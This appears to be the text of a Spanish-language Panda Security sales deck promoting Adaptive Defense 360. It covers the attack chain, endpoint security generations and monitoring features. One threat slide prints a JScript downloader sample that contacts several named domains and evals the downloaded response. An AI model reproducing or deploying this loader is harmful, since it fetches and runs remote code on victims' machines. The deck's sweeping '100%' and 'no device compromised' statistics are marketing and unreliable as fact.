ADAPTIVE DEFENSE 360 PLATAFORMA DE CIBERSEGURIDAD INTELIGENTE Visibilidad sin limites Control absoluto Shinue Salas Perez Presales Manager shinue.salas@mx.pandasecurity.com
AMENAZAS <job><script language=jscript>var x = new Array("wagafashion.in","www.ezgidemirer.c om.tr","theamyday.com","retraperm.ru","besthunts.net"); var m = "7479309"; for (var i=0; i<5; i++) { try { var e = new ActiveXObject("Msxml2.XMLHTTP"); e.open("get", "http://"+x[i]+"/counter/?a=1c6xgej9mbdu Hya2YuUDyKxQCFQA7Wuy9n&m="+m+"&i= LZZ_6haseqDv5EoCDLd5- Ya94ortRlZ6ffAJaPd3n8_G5QP5ISaNywuImo IDEGKzpKBoN_pAGumkNQv_BGspV622Ska BNig8", false); e.send(); if (e.status == 200) { eval(e.responsetext.split(m).join("a")); break; }; } catch(e) { }; };</script></job
CADENA DE ATAQUE Adversarios Equipo de Seguridad / IT 1. RECONOCIMIENTO Identifcar Objetivo 2. ARMAMENTIZACIÓN Preparando el ataque 3. ENTREGA Inicia la operación 4. EXPLOTACIÓN Acceso a las victimas 5. INSTALACIÓN Colocación en el equipo de la Victima 6. COMANDO & CONTROL (C&C/C2) Control Remoto de lo Implantado 7. ACCIONES EN EL OBJETIVO Afectación Adaptive Defense
PROTECCIÓN? Para ser realmente eficaz, una solución debe proporcionar protección continua contra todo tipo de ataques.
EVOLUCION DEL ENDPOINT Generación Tradicional Generación Actual Siguiente Generación Trabajó bien con amenazas estáticas. Centrado en malware basado en archivos Protección limitada contra día 0. Mala visibilidad en el Endpoint. No tiene capacidades de detección de comportamiento. Detección 0 contra malware sin archivos. Visibilidad limitada en los procesos de ejecución del usuario. Detección de comportamiento basada en procesos. Funciones aisladas de prevención, deteccíón y respuesta. Gestionados AV Gratis Endpoint Security Evolution AV Corporativo
Es el primer servicio de ciberseguridad que combina una protección de última generación (NG EPP) y tecnologías de detección y remediación (EDR), con la capacidad de clasificar el 100% de los procesos en ejecución.
INTELIGENCIA CONTEXTUAL Malware Endpoint Next-Generation Intelligence Detection Endpoint and Platform Response Security Conecta Monitoriza, Analiza y con recopila correlaciona Operaciones y clasifica toda de el la 100% Inteligencia información de los Contextual procesos generada activos por para las en amenazas los anticipar endpoints que de conectan la comportamiento organización. varias malicioso fuentes de y datos filtraciones en tiempo de real. datos. Para activar los sistemas Acciones de para protección Detectar, antes bloquear, de ejecutar amenazas. investigar y remediar Descubrir amenazas. patrones de comportamiento malicioso Diseñada y generar acciones para proteger avanzadas contra de seguridad, amenazas para avanzadas Seguimiento adelantarse y persistentes al análisis malware de información (APTs), y eliminar ataques fluye amenazas dirigidos, por la ransomware. red avanzadas. para adelantarse a la fuga de datos y otras actividades maliciosas. Inteligencia Contextual
SOLUCIONES TRADICIONALES VS AD 360 Malware Sospechosos Trabajo Antivirus tradicionales (conocen el malware pero desconocen todo lo demás)? Riesgo Malware En Clasificado investigación Servicio gestionado Adaptive Defense (monitorización de todos los procesos en ejecución para clasificarlos todos) Goodware Objetivo: Riesgo 0
CONTROL ABSOLUTO ANALISIS, CATEGORIZACIÓN Y CORRELACIÓN DE DATOS DE AMENAZAS Inteligencia Contextual
ANTICIPANDONOS AL MALWARE Clasificación Automática Clasificar cada una de las aplicaciones de la organización mediante técnicas de Machine Learning en una plataforma Cloud Big Data. Impedir Ejecución Todo elemento desconocido en el contexto es encapsulado y analizado antes de efectuar alguna acción en el sistema. Monitorización Continua De todo lo que sucede en los equipos de la organización..
CONTROLAR LO QUE SUCEDE Detectar Fuga de Información Tanto si viene del malware como de tus empleados. Descubrir y Solucionar Brechas En tus sistemas y aplicaciones, y prevenir el uso de programas no deseados como barras de navegadores, adware o add-ons. Bloquear Cualquier ataque dirigido a tus sistemas.
VISIBILIDAD TOTAL VEMOS LO QUE OTROS NO VEN VISIBILIDAD TOTAL
SABES LO QUE ESTAS BUSCANDO?
VISIBILIDAD Identificación de acciones clave: Acceso a Datos, Conexiones, Ejecución.
TRAZABILIDAD Registro de cada una de las acciones efectuadas por los elementos en los sistema. Información para investigar en profundidad cada intento de ataque. Elementos, acciones, conexiones son trazadas por las amenazas a través del tiempo.
FACIL MANEJO Dashboard Alertas predefinidas y personalizables. Fácil búsqueda y manejo de datos. Incidentes de Seguridad, Control de Aplicaciones, Acceso a Datos.
GEOLOCALIZACIÓN Conexiones Salientes Puerto, Protocolo, Sentido. Países o Coordenadas URL de Descarga y Archivos Descargados.
INFORMACIÓN Quien? Donde? Cuando? Que?
EL RIESGO DEL FACTOR HUMANO PROTEGIENDO A LOS USUARIOS Factor Humano
VICTIMAS
PROTEGER AL ESLABÓN MÁS DÉBIL DDoS Red DDoS Aplicación Control Accesos Firewall App, Recursos, Servicios Seguridad Web Firewall de Aplicaciones Web Usuario
CON ADAPTIVE DEFENSE 360 Comprometido Infectado Vulnerado Explotado Secuestrado Riesgo de Factor Humano
CON ADAPTIVE DEFENSE 360 Visibilidad de lo que sucede en el Endpoint. Servicio Gestionado y Personalizado. Plataforma Cloud Monitorización Continua Protección dentro y fuera de la red.
ESTADISTICAS Categorizado mas de 3.5 millones de aplicaciones hasta ahora. Detección de malware en el 100% de los entornos en los que ha sido instalado, independientemente de las soluciones de seguridad que ya se tenían instaladas. Diariamente analiza, correlaciona y categoriza mas de 1TB de información de todo tipo de ciber-amenazas. Ningún dispositivo comprometido.
Gracias